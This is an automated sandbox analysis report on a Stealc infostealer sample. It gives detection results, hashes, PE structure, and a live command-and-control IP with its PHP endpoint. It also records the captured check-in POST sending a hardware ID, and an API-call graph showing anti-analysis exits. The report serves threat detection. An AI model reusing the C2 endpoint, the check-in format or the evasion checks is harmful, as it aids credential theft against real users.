                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php;file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php5file.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpufile.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/wsfile.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpXfile.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37/e2b1563c6670f193.phpgfile.exe, 00000000.00000002.1413525563.00000000011C7000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1522760
                            Start date and time:2024-09-30 16:31:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 53s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:6
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 81%
                            • Number of executed functions: 20
                            • Number of non-executed functions: 86
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            4qIl08vrFY.exeGet hashmaliciousAmadey, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            4qIl08vrFY.exeGet hashmaliciousAmadey, StealcBrowse
                            • 185.215.113.103
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949616985181135
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'846'272 bytes
                            MD5:e9912f8bbba8a435c0770c5cb9dbdee2
                            SHA1:f323b850b002137ec47f291d928378245d4670fe
                            SHA256:f53185e3b9046b1c522d14dfed5988e0b4096cd5302e13a0d3e77207e014d797
                            SHA512:640a900f0655c839df55eb130270e1dad80a1a9ac60796c816d330156fdf48e3495acbf643d777c647868714c54b653386109cd6e3ceb49126f04eeb6ecee9e8
                            SSDEEP:49152:wdg0ihASkGCxyd3OqAl4aiQn0JNNyT+qrfNSqmL:wRNG2ycRiQ0JNN50NST
                            TLSH:1885331B6B4AD07CF5759D7DAD126CD86FF4C9783FB1638ABC2D365DBA3024001298A2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xaa5000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F5E98DB28DAh

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x22800b216b02c7acba77814495535efbacac9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2a90000x20021d4d1ef6cfc2472c07f87a924b1ccd9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            ceyxbmwp0x5070000x19d0000x19ca00f00f507ef83f0361c59202148969f6fbFalse0.9950204483489852data7.955340871068763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            arpaejxu0x6a40000x10000x4009d6978de847da33de1f0176ec63ea5a0False0.7978515625data6.239485481484981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6a50000x30000x2200b22a3f41f67555fb0fcee129053b0a3eFalse0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-09-30T16:32:04.742514+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.949706185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 30, 2024 16:32:03.595516920 CEST4970680192.168.2.9185.215.113.37
                            Sep 30, 2024 16:32:03.789464951 CEST8049706185.215.113.37192.168.2.9
                            Sep 30, 2024 16:32:03.789587975 CEST4970680192.168.2.9185.215.113.37
                            Sep 30, 2024 16:32:03.790220976 CEST4970680192.168.2.9185.215.113.37
                            Sep 30, 2024 16:32:03.795480013 CEST8049706185.215.113.37192.168.2.9
                            Sep 30, 2024 16:32:04.506990910 CEST8049706185.215.113.37192.168.2.9
                            Sep 30, 2024 16:32:04.507098913 CEST4970680192.168.2.9185.215.113.37
                            Sep 30, 2024 16:32:04.510941982 CEST4970680192.168.2.9185.215.113.37
                            Sep 30, 2024 16:32:04.517230988 CEST8049706185.215.113.37192.168.2.9
                            Sep 30, 2024 16:32:04.742451906 CEST8049706185.215.113.37192.168.2.9
                            Sep 30, 2024 16:32:04.742513895 CEST4970680192.168.2.9185.215.113.37
                            Sep 30, 2024 16:32:06.969997883 CEST4970680192.168.2.9185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.949706185.215.113.37807640C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Sep 30, 2024 16:32:03.790220976 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Sep 30, 2024 16:32:04.506990910 CEST203INHTTP/1.1 200 OK
                            Date: Mon, 30 Sep 2024 14:32:04 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Sep 30, 2024 16:32:04.510941982 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 37 43 45 30 30 32 37 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 4b 2d 2d 0d 0a
                            Data Ascii: ------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="hwid"477CE00270C53528003197------HDHJEBFBFHJECAKFCAAKContent-Disposition: form-data; name="build"doma------HDHJEBFBFHJECAKFCAAK--
                            Sep 30, 2024 16:32:04.742451906 CEST210INHTTP/1.1 200 OK
                            Date: Mon, 30 Sep 2024 14:32:04 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:10:31:57
                            Start date:30/09/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x4b0000
                            File size:1'846'272 bytes
                            MD5 hash:E9912F8BBBA8A435C0770C5CB9DBDEE2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1371291825.0000000005000000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1413525563.000000000116E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1411617744.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:8.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:25
                              execution_graph 13492 8a49c0 13495 8a44be 13492->13495 13493 8a6ec9 RegOpenKeyA 13493->13495 13494 8a6ea2 RegOpenKeyA 13494->13493 13494->13495 13495->13492 13495->13493 13495->13494 13496 8a6f2a GetNativeSystemInfo 13495->13496 13497 8a6f7f 13495->13497 13496->13495 13497->13497 13498 4c69f0 13543 4b2260 13498->13543 13522 4c6a64 13523 4ca9b0 4 API calls 13522->13523 13524 4c6a6b 13523->13524 13525 4ca9b0 4 API calls 13524->13525 13526 4c6a72 13525->13526 13527 4ca9b0 4 API calls 13526->13527 13528 4c6a79 13527->13528 13529 4ca9b0 4 API calls 13528->13529 13530 4c6a80 13529->13530 13695 4ca8a0 13530->13695 13532 4c6b0c 13699 4c6920 GetSystemTime 13532->13699 13534 4c6a89 13534->13532 13536 4c6ac2 OpenEventA 13534->13536 13538 4c6ad9 13536->13538 13539 4c6af5 CloseHandle Sleep 13536->13539 13542 4c6ae1 CreateEventA 13538->13542 13541 4c6b0a 13539->13541 13541->13534 13542->13532 13896 4b45c0 13543->13896 13545 4b2274 13546 4b45c0 2 API calls 13545->13546 13547 4b228d 13546->13547 13548 4b45c0 2 API calls 13547->13548 13549 4b22a6 13548->13549 13550 4b45c0 2 API calls 13549->13550 13551 4b22bf 13550->13551 13552 4b45c0 2 API calls 13551->13552 13553 4b22d8 13552->13553 13554 4b45c0 2 API calls 13553->13554 13555 4b22f1 13554->13555 13556 4b45c0 2 API calls 13555->13556 13557 4b230a 13556->13557 13558 4b45c0 2 API calls 13557->13558 13559 4b2323 13558->13559 13560 4b45c0 2 API calls 13559->13560 13561 4b233c 13560->13561 13562 4b45c0 2 API calls 13561->13562 13563 4b2355 13562->13563 13564 4b45c0 2 API calls 13563->13564 13565 4b236e 13564->13565 13566 4b45c0 2 API calls 13565->13566 13567 4b2387 13566->13567 13568 4b45c0 2 API calls 13567->13568 13569 4b23a0 13568->13569 13570 4b45c0 2 API calls 13569->13570 13571 4b23b9 13570->13571 13572 4b45c0 2 API calls 13571->13572 13573 4b23d2 13572->13573 13574 4b45c0 2 API calls 13573->13574 13575 4b23eb 13574->13575 13576 4b45c0 2 API calls 13575->13576 13577 4b2404 13576->13577 13578 4b45c0 2 API calls 13577->13578 13579 4b241d 13578->13579 13580 4b45c0 2 API calls 13579->13580 13581 4b2436 13580->13581 13582 4b45c0 2 API calls 13581->13582 13583 4b244f 13582->13583 13584 4b45c0 2 API calls 13583->13584 13585 4b2468 13584->13585 13586 4b45c0 2 API calls 13585->13586 13587 4b2481 13586->13587 13588 4b45c0 2 API calls 13587->13588 13589 4b249a 13588->13589 13590 4b45c0 2 API calls 13589->13590 13591 4b24b3 13590->13591 13592 4b45c0 2 API calls 13591->13592 13593 4b24cc 13592->13593 13594 4b45c0 2 API calls 13593->13594 13595 4b24e5 13594->13595 13596 4b45c0 2 API calls 13595->13596 13597 4b24fe 13596->13597 13598 4b45c0 2 API calls 13597->13598 13599 4b2517 13598->13599 13600 4b45c0 2 API calls 13599->13600 13601 4b2530 13600->13601 13602 4b45c0 2 API calls 13601->13602 13603 4b2549 13602->13603 13604 4b45c0 2 API calls 13603->13604 13605 4b2562 13604->13605 13606 4b45c0 2 API calls 13605->13606 13607 4b257b 13606->13607 13608 4b45c0 2 API calls 13607->13608 13609 4b2594 13608->13609 13610 4b45c0 2 API calls 13609->13610 13611 4b25ad 13610->13611 13612 4b45c0 2 API calls 13611->13612 13613 4b25c6 13612->13613 13614 4b45c0 2 API calls 13613->13614 13615 4b25df 13614->13615 13616 4b45c0 2 API calls 13615->13616 13617 4b25f8 13616->13617 13618 4b45c0 2 API calls 13617->13618 13619 4b2611 13618->13619 13620 4b45c0 2 API calls 13619->13620 13621 4b262a 13620->13621 13622 4b45c0 2 API calls 13621->13622 13623 4b2643 13622->13623 13624 4b45c0 2 API calls 13623->13624 13625 4b265c 13624->13625 13626 4b45c0 2 API calls 13625->13626 13627 4b2675 13626->13627 13628 4b45c0 2 API calls 13627->13628 13629 4b268e 13628->13629 13630 4c9860 13629->13630 13901 4c9750 GetPEB 13630->13901 13632 4c9868 13633 4c987a 13632->13633 13634 4c9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13632->13634 13637 4c988c 21 API calls 13633->13637 13635 4c9b0d 13634->13635 13636 4c9af4 GetProcAddress 13634->13636 13638 4c9b46 13635->13638 13639 4c9b16 GetProcAddress GetProcAddress 13635->13639 13636->13635 13637->13634 13640 4c9b4f GetProcAddress 13638->13640 13641 4c9b68 13638->13641 13639->13638 13640->13641 13642 4c9b89 13641->13642 13643 4c9b71 GetProcAddress 13641->13643 13644 4c6a00 13642->13644 13645 4c9b92 GetProcAddress GetProcAddress 13642->13645 13643->13642 13646 4ca740 13644->13646 13645->13644 13647 4ca750 13646->13647 13648 4c6a0d 13647->13648 13649 4ca77e lstrcpy 13647->13649 13650 4b11d0 13648->13650 13649->13648 13651 4b11e8 13650->13651 13652 4b120f ExitProcess 13651->13652 13653 4b1217 13651->13653 13654 4b1160 GetSystemInfo 13653->13654 13655 4b117c ExitProcess 13654->13655 13656 4b1184 13654->13656 13657 4b1110 GetCurrentProcess VirtualAllocExNuma 13656->13657 13658 4b1149 13657->13658 13659 4b1141 ExitProcess 13657->13659 13902 4b10a0 VirtualAlloc 13658->13902 13662 4b1220 13906 4c89b0 13662->13906 13665 4b1249 13666 4b129a 13665->13666 13667 4b1292 ExitProcess 13665->13667 13668 4c6770 GetUserDefaultLangID 13666->13668 13669 4c6792 13668->13669 13670 4c67d3 13668->13670 13669->13670 13671 4c67ad ExitProcess 13669->13671 13672 4c67cb ExitProcess 13669->13672 13673 4c67b7 ExitProcess 13669->13673 13674 4c67c1 ExitProcess 13669->13674 13675 4c67a3 ExitProcess 13669->13675 13676 4b1190 13670->13676 13677 4c78e0 3 API calls 13676->13677 13678 4b119e 13677->13678 13679 4b11cc 13678->13679 13680 4c7850 3 API calls 13678->13680 13683 4c7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13679->13683 13681 4b11b7 13680->13681 13681->13679 13682 4b11c4 ExitProcess 13681->13682 13684 4c6a30 13683->13684 13685 4c78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13684->13685 13686 4c6a43 13685->13686 13687 4ca9b0 13686->13687 13908 4ca710 13687->13908 13689 4ca9c1 lstrlen 13691 4ca9e0 13689->13691 13690 4caa18 13909 4ca7a0 13690->13909 13691->13690 13693 4ca9fa lstrcpy lstrcat 13691->13693 13693->13690 13694 4caa24 13694->13522 13696 4ca8bb 13695->13696 13697 4ca90b 13696->13697 13698 4ca8f9 lstrcpy 13696->13698 13697->13534 13698->13697 13913 4c6820 13699->13913 13701 4c698e 13702 4c6998 sscanf 13701->13702 13942 4ca800 13702->13942 13704 4c69aa SystemTimeToFileTime SystemTimeToFileTime 13705 4c69ce 13704->13705 13706 4c69e0 13704->13706 13705->13706 13707 4c69d8 ExitProcess 13705->13707 13708 4c5b10 13706->13708 13709 4c5b1d 13708->13709 13710 4ca740 lstrcpy 13709->13710 13711 4c5b2e 13710->13711 13944 4ca820 lstrlen 13711->13944 13714 4ca820 2 API calls 13715 4c5b64 13714->13715 13716 4ca820 2 API calls 13715->13716 13717 4c5b74 13716->13717 13948 4c6430 13717->13948 13720 4ca820 2 API calls 13721 4c5b93 13720->13721 13722 4ca820 2 API calls 13721->13722 13723 4c5ba0 13722->13723 13724 4ca820 2 API calls 13723->13724 13725 4c5bad 13724->13725 13726 4ca820 2 API calls 13725->13726 13727 4c5bf9 13726->13727 13957 4b26a0 13727->13957 13735 4c5cc3 13736 4c6430 lstrcpy 13735->13736 13737 4c5cd5 13736->13737 13738 4ca7a0 lstrcpy 13737->13738 13739 4c5cf2 13738->13739 13740 4ca9b0 4 API calls 13739->13740 13741 4c5d0a 13740->13741 13742 4ca8a0 lstrcpy 13741->13742 13743 4c5d16 13742->13743 13744 4ca9b0 4 API calls 13743->13744 13745 4c5d3a 13744->13745 13746 4ca8a0 lstrcpy 13745->13746 13747 4c5d46 13746->13747 13748 4ca9b0 4 API calls 13747->13748 13749 4c5d6a 13748->13749 13750 4ca8a0 lstrcpy 13749->13750 13751 4c5d76 13750->13751 13752 4ca740 lstrcpy 13751->13752 13753 4c5d9e 13752->13753 14683 4c7500 GetWindowsDirectoryA 13753->14683 13756 4ca7a0 lstrcpy 13757 4c5db8 13756->13757 14693 4b4880 13757->14693 13759 4c5dbe 14838 4c17a0 13759->14838 13761 4c5dc6 13762 4ca740 lstrcpy 13761->13762 13763 4c5de9 13762->13763 13764 4b1590 lstrcpy 13763->13764 13765 4c5dfd 13764->13765 14854 4b5960 13765->14854 13767 4c5e03 14998 4c1050 13767->14998 13769 4c5e0e 13770 4ca740 lstrcpy 13769->13770 13771 4c5e32 13770->13771 13772 4b1590 lstrcpy 13771->13772 13773 4c5e46 13772->13773 13774 4b5960 34 API calls 13773->13774 13775 4c5e4c 13774->13775 15002 4c0d90 13775->15002 13777 4c5e57 13778 4ca740 lstrcpy 13777->13778 13779 4c5e79 13778->13779 13780 4b1590 lstrcpy 13779->13780 13781 4c5e8d 13780->13781 13782 4b5960 34 API calls 13781->13782 13783 4c5e93 13782->13783 15009 4c0f40 13783->15009 13785 4c5e9e 13786 4b1590 lstrcpy 13785->13786 13787 4c5eb5 13786->13787 15014 4c1a10 13787->15014 13789 4c5eba 13790 4ca740 lstrcpy 13789->13790 13791 4c5ed6 13790->13791 15358 4b4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13791->15358 13793 4c5edb 13794 4b1590 lstrcpy 13793->13794 13795 4c5f5b 13794->13795 15365 4c0740 13795->15365 13797 4c5f60 13798 4ca740 lstrcpy 13797->13798 13799 4c5f86 13798->13799 13800 4b1590 lstrcpy 13799->13800 13801 4c5f9a 13800->13801 13897 4b45d1 RtlAllocateHeap 13896->13897 13900 4b4621 VirtualProtect 13897->13900 13900->13545 13901->13632 13904 4b10c2 codecvt 13902->13904 13903 4b10fd 13903->13662 13904->13903 13905 4b10e2 VirtualFree 13904->13905 13905->13903 13907 4b1233 GlobalMemoryStatusEx 13906->13907 13907->13665 13908->13689 13910 4ca7c2 13909->13910 13911 4ca7ec 13910->13911 13912 4ca7da lstrcpy 13910->13912 13911->13694 13912->13911 13914 4ca740 lstrcpy 13913->13914 13915 4c6833 13914->13915 13916 4ca9b0 4 API calls 13915->13916 13917 4c6845 13916->13917 13918 4ca8a0 lstrcpy 13917->13918 13919 4c684e 13918->13919 13920 4ca9b0 4 API calls 13919->13920 13921 4c6867 13920->13921 13922 4ca8a0 lstrcpy 13921->13922 13923 4c6870 13922->13923 13924 4ca9b0 4 API calls 13923->13924 13925 4c688a 13924->13925 13926 4ca8a0 lstrcpy 13925->13926 13927 4c6893 13926->13927 13928 4ca9b0 4 API calls 13927->13928 13929 4c68ac 13928->13929 13930 4ca8a0 lstrcpy 13929->13930 13931 4c68b5 13930->13931 13932 4ca9b0 4 API calls 13931->13932 13933 4c68cf 13932->13933 13934 4ca8a0 lstrcpy 13933->13934 13935 4c68d8 13934->13935 13936 4ca9b0 4 API calls 13935->13936 13937 4c68f3 13936->13937 13938 4ca8a0 lstrcpy 13937->13938 13939 4c68fc 13938->13939 13940 4ca7a0 lstrcpy 13939->13940 13941 4c6910 13940->13941 13941->13701 13943 4ca812 13942->13943 13943->13704 13945 4ca83f 13944->13945 13946 4c5b54 13945->13946 13947 4ca87b lstrcpy 13945->13947 13946->13714 13947->13946 13949 4ca8a0 lstrcpy 13948->13949 13950 4c6443 13949->13950 13951 4ca8a0 lstrcpy 13950->13951 13952 4c6455 13951->13952 13953 4ca8a0 lstrcpy 13952->13953 13954 4c6467 13953->13954 13955 4ca8a0 lstrcpy 13954->13955 13956 4c5b86 13955->13956 13956->13720 13958 4b45c0 2 API calls 13957->13958 13959 4b26b4 13958->13959 13960 4b45c0 2 API calls 13959->13960 13961 4b26d7 13960->13961 13962 4b45c0 2 API calls 13961->13962 13963 4b26f0 13962->13963 13964 4b45c0 2 API calls 13963->13964 13965 4b2709 13964->13965 13966 4b45c0 2 API calls 13965->13966 13967 4b2736 13966->13967 13968 4b45c0 2 API calls 13967->13968 13969 4b274f 13968->13969 13970 4b45c0 2 API calls 13969->13970 13971 4b2768 13970->13971 13972 4b45c0 2 API calls 13971->13972 13973 4b2795 13972->13973 13974 4b45c0 2 API calls 13973->13974 13975 4b27ae 13974->13975 13976 4b45c0 2 API calls 13975->13976 13977 4b27c7 13976->13977 13978 4b45c0 2 API calls 13977->13978 13979 4b27e0 13978->13979 13980 4b45c0 2 API calls 13979->13980 13981 4b27f9 13980->13981 13982 4b45c0 2 API calls 13981->13982 13983 4b2812 13982->13983 13984 4b45c0 2 API calls 13983->13984 13985 4b282b 13984->13985 13986 4b45c0 2 API calls 13985->13986 13987 4b2844 13986->13987 